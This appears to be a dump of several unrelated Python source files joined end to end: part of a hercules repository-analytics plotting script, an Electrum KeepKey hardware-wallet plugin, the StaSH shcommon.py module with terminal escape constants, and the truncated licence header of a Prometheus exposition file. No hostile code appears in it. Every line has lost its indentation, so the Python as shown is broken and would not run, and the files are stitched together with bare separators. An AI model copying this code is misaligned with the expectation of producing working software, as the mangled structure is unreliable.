locs = pyplot.gca().get_xticks().tolist()
if len(locs) >= 16:
pyplot.gca().xaxis.set_major_locator(locator)
if locs[0] < pyplot.xlim()[0]:
del locs[0]
endindex = -1
if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
locs.append(pyplot.xlim()[1])
endindex = len(locs) - 1
startindex = -1
if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
locs.append(pyplot.xlim()[0])
startindex = len(locs) - 1
pyplot.gca().set_xticks(locs)
# hacking time!
labels = pyplot.gca().get_xticklabels()
if startindex >= 0:
labels[startindex].set_text(xdates[0].date())
labels[startindex].set_text = lambda _: None
labels[startindex].set_rotation(30)
labels[startindex].set_ha("right")
if endindex >= 0:
labels[endindex].set_text(xdates[-1].date())
labels[endindex].set_text = lambda _: None
labels[endindex].set_rotation(30)
labels[endindex].set_ha("right")
overall_pos = sum(2 * (0.5 - d[1].Value) for d in data if d[1].Value < 0.5)
overall_neg = sum(2 * (d[1].Value - 0.5) for d in data if d[1].Value > 0.5)
title = "%s sentiment +%.1f -%.1f δ=%.1f" % (
name, overall_pos, overall_neg, overall_pos - overall_neg)
deploy_plot(title, args.output, args.style)
def main():
args = parse_args()
reader = read_input(args)
header = reader.get_header()
name = reader.get_name()
burndown_warning = "Burndown stats were not collected. Re-run hercules with --burndown."
burndown_files_warning = \
"Burndown stats for files were not collected. Re-run hercules with " \
"--burndown --burndown-files."
burndown_people_warning = \
"Burndown stats for people were not collected. Re-run hercules with " \
"--burndown --burndown-people."
couples_warning = "Coupling stats were not collected. Re-run hercules with --couples."
shotness_warning = "Structural hotness stats were not collected. Re-run hercules with " \
"--shotness. Also check --languages - the output may be empty."
sentiment_warning = "Sentiment stats were not collected. Re-run hercules with --sentiment."
def run_times():
rt = reader.get_run_times()
import pandas
series = pandas.to_timedelta(pandas.Series(rt).sort_values(ascending=False), unit="s")
df = pandas.concat([series, series / series.sum()], axis=1)
df.columns = ["time", "ratio"]
print(df)
def project_burndown():
try:
full_header = header + reader.get_burndown_parameters()
except KeyError:
print("project: " + burndown_warning)
return
plot_burndown(args, "project",
*load_burndown(full_header, *reader.get_project_burndown(),
resample=args.resample))
def files_burndown():
try:
full_header = header + reader.get_burndown_parameters()
except KeyError:
print(burndown_warning)
return
try:
plot_many_burndown(args, "file", full_header, reader.get_files_burndown())
except KeyError:
print("files: " + burndown_files_warning)
def people_burndown():
try:
full_header = header + reader.get_burndown_parameters()
except KeyError:
print(burndown_warning)
return
try:
plot_many_burndown(args, "person", full_header, reader.get_people_burndown())
except KeyError:
print("people: " + burndown_people_warning)
def churn_matrix():
try:
plot_churn_matrix(args, name, *load_churn_matrix(
*reader.get_people_interaction(), max_people=args.max_people))
except KeyError:
print("churn_matrix: " + burndown_people_warning)
def ownership_burndown():
try:
full_header = header + reader.get_burndown_parameters()
except KeyError:
print(burndown_warning)
return
try:
plot_ownership(args, name, *load_ownership(
full_header, *reader.get_ownership_burndown(), max_people=args.max_people))
except KeyError:
print("ownership: " + burndown_people_warning)
def couples():
try:
write_embeddings("files", args.output, not args.disable_projector,
*train_embeddings(*reader.get_files_coocc(),
tmpdir=args.couples_tmp_dir))
write_embeddings("people", args.output, not args.disable_projector,
*train_embeddings(*reader.get_people_coocc(),
tmpdir=args.couples_tmp_dir))
except KeyError:
print(couples_warning)
try:
write_embeddings("shotness", args.output, not args.disable_projector,
*train_embeddings(*reader.get_shotness_coocc(),
tmpdir=args.couples_tmp_dir))
except KeyError:
print(shotness_warning)
def shotness():
try:
data = reader.get_shotness()
except KeyError:
print(shotness_warning)
return
show_shotness_stats(data)
def sentiment():
try:
data = reader.get_sentiment()
except KeyError:
print(sentiment_warning)
return
show_sentiment_stats(args, reader.get_name(), args.resample, reader.get_header()[0], data)
if args.mode == "run_times":
run_times()
elif args.mode == "project":
project_burndown()
elif args.mode == "file":
files_burndown()
elif args.mode == "person":
people_burndown()
elif args.mode == "churn_matrix":
churn_matrix()
elif args.mode == "ownership":
ownership_burndown()
elif args.mode == "couples":
couples()
elif args.mode == "shotness":
shotness()
elif args.mode == "sentiment":
sentiment()
elif args.mode == "all":
project_burndown()
files_burndown()
people_burndown()
churn_matrix()
ownership_burndown()
couples()
shotness()
sentiment()
if web_server.running:
secs = int(os.getenv("COUPLES_SERVER_TIME", "60"))
print("Sleeping for %d seconds, safe to Ctrl-C" % secs)
sys.stdout.flush()
try:
time.sleep(secs)
except KeyboardInterrupt:
pass
web_server.stop()
if __name__ == "__main__":
sys.exit(main())
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.wallet import Standard_Wallet
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
shcommon.py | # -*- coding: utf-8 -*-
"""
The Control, Escape and Graphics are taken from pyte (https://github.com/selectel/pyte)
"""
import os
import sys
import platform
import functools
import threading
import ctypes
from itertools import chain
import six
IN_PYTHONISTA = sys.executable.find('Pythonista') >= 0
if IN_PYTHONISTA:
import plistlib
_properties = plistlib.readPlist(os.path.join(os.path.dirname(sys.executable), 'Info.plist'))
PYTHONISTA_VERSION = _properties['CFBundleShortVersionString']
PYTHONISTA_VERSION_LONG = _properties['CFBundleVersion']
if PYTHONISTA_VERSION < '3.0':
python_capi = ctypes.pythonapi
else:
# The default pythonapi always points to Python 3 in Pythonista 3
# So we need to load the Python 2 API manually
try:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/Py2Kit.framework/Py2Kit'))
except OSError:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/PythonistaKit.framework/PythonistaKit'))
else:
PYTHONISTA_VERSION = '0.0'
PYTHONISTA_VERSION_LONG = '000000'
python_capi = ctypes.pythonapi
platform_string = platform.platform()
ON_IPAD = platform_string.find('iPad') >= 0
ON_IOS_8 = platform_string.split('-')[1].startswith('14')
M_64 = platform_string.find('64bit') != -1
CTRL_KEY_FLAG = (1 << 18) # Control key for keyCommands
CMD_KEY_FLAG = (1 << 20) # Command key
_STASH_ROOT = os.path.realpath(os.path.abspath(
os.path.dirname(os.path.dirname(__file__))))
_STASH_CONFIG_FILES = ('.stash_config', 'stash.cfg')
_STASH_HISTORY_FILE = '.stash_history'
# directory for stash extensions
_STASH_EXTENSION_PATH = os.path.abspath(
os.path.join(os.getenv("HOME"), "Documents", "stash_extensions"),
)
# directory for stash bin extensions
_STASH_EXTENSION_BIN_PATH = os.path.join(_STASH_EXTENSION_PATH, "bin")
# directory for stash man extensions
_STASH_EXTENSION_MAN_PATH = os.path.join(_STASH_EXTENSION_PATH, "man")
# directory for stash FSI extensions
_STASH_EXTENSION_FSI_PATH = os.path.join(_STASH_EXTENSION_PATH, "fsi")
# directory for stash patch extensions
_STASH_EXTENSION_PATCH_PATH = os.path.join(_STASH_EXTENSION_PATH, "patches")
# list of directories outside of _STASH_ROOT, used for simple mkdir
_EXTERNAL_DIRS = [
_STASH_EXTENSION_PATH,
_STASH_EXTENSION_BIN_PATH,
_STASH_EXTENSION_MAN_PATH,
_STASH_EXTENSION_FSI_PATH,
_STASH_EXTENSION_PATCH_PATH,
]
# Python 3 or not Python 3
PY3 = six.PY3
# Save the true IOs
if IN_PYTHONISTA:
# The stdio catchers recreation is copied from code written by @dgelessus
# https://forum.omz-software.com/topic/1946/pythonista-1-6-beta/167
# In pythonista beta 301006, _outputcapture was replaced with pykit_io
try:
import _outputcapture
except ImportError:
import pykit_io
class _outputcapture(object):
ReadStdin=pykit_io.read_stdin
CaptureStdout=pykit_io.write_stdout
CaptureStderr=pykit_io.write_stderr
if sys.stdin.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__ = sys.stdin
elif sys.__stdin__.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__
else:
class StdinCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def read(self, limit=-1):
return _outputcapture.ReadStdin(limit)
def readline(self):
return _outputcapture.ReadStdin()
_SYS_STDIN = StdinCatcher()
if sys.stdout.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__ = sys.stdout
elif sys.__stdout__.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__
else:
class StdoutCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStdout(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStdout(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDOUT = StdoutCatcher()
if sys.stderr.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__ = sys.stderr
elif sys.stderr.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__
else:
class StderrCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStderr(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStderr(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDERR = StderrCatcher()
else:
_SYS_STDOUT = sys.stdout
_SYS_STDERR = sys.stderr
_SYS_STDIN = sys.stdin
_SYS_PATH = sys.path
_OS_ENVIRON = os.environ
def is_binary_file(filename, nbytes=1024):
"""
An approximate way to tell whether a file is binary.
:param str filename: The name of the file to be tested.
:param int nbytes: number of bytes to read for test
:return:
"""
with open(filename, 'rb') as ins:
for c in ins.read(nbytes):
if isinstance(c, six.integer_types):
oc = c
else:
oc = ord(c)
if 127 < oc < 256 or (oc < 32 and oc not in (9, 10, 13)):
return True
else:
return False
def sh_delay(func, nseconds):
t = threading.Timer(nseconds, func)
t.start()
return t
def sh_background(name=None):
def wrap(func):
@functools.wraps(func)
def wrapped_func(*args, **kwargs):
t = threading.Thread(name=name, target=func, args=args, kwargs=kwargs)
t.start()
return t
return wrapped_func
return wrap
class ShFileNotFound(Exception):
pass
class ShIsDirectory(Exception):
pass
class ShNotExecutable(Exception):
def __init__(self, filename):
super(Exception, self).__init__('{}: not executable\n'.format(filename))
class ShSingleExpansionRequired(Exception):
pass
class ShEventNotFound(Exception):
pass
class ShBadSubstitution(Exception):
pass
class ShSyntaxError(Exception):
pass
class ShInternalError(Exception):
pass
class Control(object):
"""
pyte.control
~~~~~~~~~~~~
This module defines simple control sequences, recognized by
:class:`~pyte.streams.Stream`, the set of codes here is for
``TERM=linux`` which is a superset of VT102.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Space*: Not suprisingly -- ``" "``.
SP = u" "
#: *Null*: Does nothing.
NUL = u"\u0000"
#: *Bell*: Beeps.
BEL = u"\u0007"
#: *Backspace*: Backspace one column, but not past the beginning of the
#: line.
BS = u"\u0008"
#: *Horizontal tab*: Move cursor to the next tab stop, or to the end
#: of the line if there is no earlier tab stop.
HT = u"\u0009"
#: *Linefeed*: Give a line feed, and, if :data:`pyte.modes.LNM` (new
#: line mode) is set also a carriage return.
LF = u"\n"
#: *Vertical tab*: Same as :data:`LF`.
VT = u"\u000b"
#: *Form feed*: Same as :data:`LF`.
FF = u"\u000c"
#: *Carriage return*: Move cursor to left margin on current line.
CR = u"\r"
#: *Shift out*: Activate G1 character set.
SO = u"\u000e"
#: *Shift in*: Activate G0 character set.
SI = u"\u000f"
#: *Cancel*: Interrupt escape sequence. If received during an escape or
#: control sequence, cancels the sequence and displays substitution
#: character.
CAN = u"\u0018"
#: *Substitute*: Same as :data:`CAN`.
SUB = u"\u001a"
#: *Escape*: Starts an escape sequence.
ESC = u"\u001b"
#: *Delete*: Is ignored.
DEL = u"\u007f"
#: *Control sequence introducer*: An equivalent for ``ESC [``.
CSI = u"\u009b"
class Escape(object):
"""
pyte.escape
~~~~~~~~~~~
This module defines both CSI and non-CSI escape sequences, recognized
by :class:`~pyte.streams.Stream` and subclasses.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Reset*.
RIS = u"c"
#: *Index*: Move cursor down one line in same column. If the cursor is
#: at the bottom margin, the screen performs a scroll-up.
IND = u"D"
#: *Next line*: Same as :data:`pyte.control.LF`.
NEL = u"E"
#: Tabulation set: Set a horizontal tab stop at cursor position.
HTS = u"H"
#: *Reverse index*: Move cursor up one line in same column. If the
#: cursor is at the top margin, the screen performs a scroll-down.
RI = u"M"
#: Save cursor: Save cursor position, character attribute (graphic
#: rendition), character set, and origin mode selection (see
#: :data:`DECRC`).
DECSC = u"7"
#: *Restore cursor*: Restore previously saved cursor position, character
#: attribute (graphic rendition), character set, and origin mode
#: selection. If none were saved, move cursor to home position.
DECRC = u"8"
# "Percent" escape sequences.
# ---------------------------
#: *Select default (ISO 646 / ISO 8859-1)*.
DEFAULT = u"@"
#: *Select UTF-8*.
UTF8 = u"G"
#: *Select UTF-8 (obsolete)*.
UTF8_OBSOLETE = u"8"
# "Sharp" escape sequences.
# -------------------------
#: *Alignment display*: Fill screen with uppercase E's for testing
#: screen focus and alignment.
DECALN = u"8"
# ECMA-48 CSI sequences.
# ---------------------
#: *Insert character*: Insert the indicated # of blank characters.
ICH = u"@"
#: *Cursor up*: Move cursor up the indicated # of lines in same column.
#: Cursor stops at top margin.
CUU = u"A"
#: *Cursor down*: Move cursor down the indicated # of lines in same
#: column. Cursor stops at bottom margin.
CUD = u"B"
#: *Cursor forward*: Move cursor right the indicated # of columns.
#: Cursor stops at right margin.
CUF = u"C"
#: *Cursor back*: Move cursor left the indicated # of columns. Cursor
#: stops at left margin.
CUB = u"D"
#: *Cursor next line*: Move cursor down the indicated # of lines to
#: column 1.
CNL = u"E"
#: *Cursor previous line*: Move cursor up the indicated # of lines to
#: column 1.
CPL = u"F"
#: *Cursor horizontal align*: Move cursor to the indicated column in
#: current line.
CHA = u"G"
#: *Cursor position*: Move cursor to the indicated line, column (origin
#: at ``1, 1``).
CUP = u"H"
#: *Erase data* (default: from cursor to end of line).
ED = u"J"
#: *Erase in line* (default: from cursor to end of line).
EL = u"K"
#: *Insert line*: Insert the indicated # of blank lines, starting from
#: the current line. Lines displayed below cursor move down. Lines moved
#: past the bottom margin are lost.
IL = u"L"
#: *Delete line*: Delete the indicated # of lines, starting from the
#: current line. As lines are deleted, lines displayed below cursor
#: move up. Lines added to bottom of screen have spaces with same
#: character attributes as last line move up.
DL = u"M"
#: *Delete character*: Delete the indicated # of characters on the
#: current line. When character is deleted, all characters to the right
#: of cursor move left.
DCH = u"P"
#: *Erase character*: Erase the indicated # of characters on the
#: current line.
ECH = u"X"
#: *Horizontal position relative*: Same as :data:`CUF`.
HPR = u"a"
#: *Vertical position adjust*: Move cursor to the indicated line,
#: current column.
VPA = u"d"
#: *Vertical position relative*: Same as :data:`CUD`.
VPR = u"e"
#: *Horizontal / Vertical position*: Same as :data:`CUP`.
HVP = u"f"
#: *Tabulation clear*: Clears a horizontal tab stop at cursor position.
TBC = u"g"
#: *Set mode*.
SM = u"h"
#: *Reset mode*.
RM = u"l"
#: *Select graphics rendition*: The terminal can display the following
#: character attributes that change the character display without
#: changing the character (see :mod:`pyte.graphics`).
SGR = u"m"
#: *Select top and bottom margins*: Selects margins, defining the
#: scrolling region; parameters are top and bottom line. If called
#: without any arguments, whole screen is used.
DECSTBM = u"r"
#: *Horizontal position adjust*: Same as :data:`CHA`.
HPA = u"'"
class Graphics(object):
# -*- coding: utf-8 -*-
"""
pyte.graphics
~~~~~~~~~~~~~
This module defines graphic-related constants, mostly taken from
:manpage:`console_codes(4)` and
http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: A mapping of ANSI text style codes to style names, "+" means the:
#: attribute is set, "-" -- reset; example:
#:
#: >>> text[1]
#: '+bold'
#: >>> text[9]
#: '+strikethrough'
TEXT = {
1: "+bold",
3: "+italics",
4: "+underscore",
7: "+reverse",
9: "+strikethrough",
22: "-bold",
23: "-italics",
24: "-underscore",
27: "-reverse",
29: "-strikethrough"
}
#: A mapping of ANSI foreground color codes to color names, example:
#:
#: >>> FG[30]
#: 'black'
#: >>> FG[38]
#: 'default'
FG = {
30: "black",
31: "red",
32: "green",
33: "brown",
34: "blue",
35: "magenta",
36: "cyan",
37: "white",
39: "default", # white.
50: "gray",
51: "yellow",
52: "smoke",
}
#: A mapping of ANSI background color codes to color names, example:
#:
#: >>> BG[40]
#: 'black'
#: >>> BG[48]
#: 'default'
BG = {
40: "black",
41: "red",
42: "green",
43: "brown",
44: "blue",
45: "magenta",
46: "cyan",
47: "white",
49: "default", # black.
60: "gray",
61: "yellow",
62: "smoke",
}
# Reverse mapping of all available attributes -- keep this private!
_SGR = {v: k for k, v in chain(FG.items(),
TEXT.items())}
_SGR.update({'bg-' + v: k for k, v in BG.items()}) |
_exposition.py | # -*- coding: utf-8 -*-
# Copyright 2015-2019 Prometheus Python Client Developers
# Copyright 2019 Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
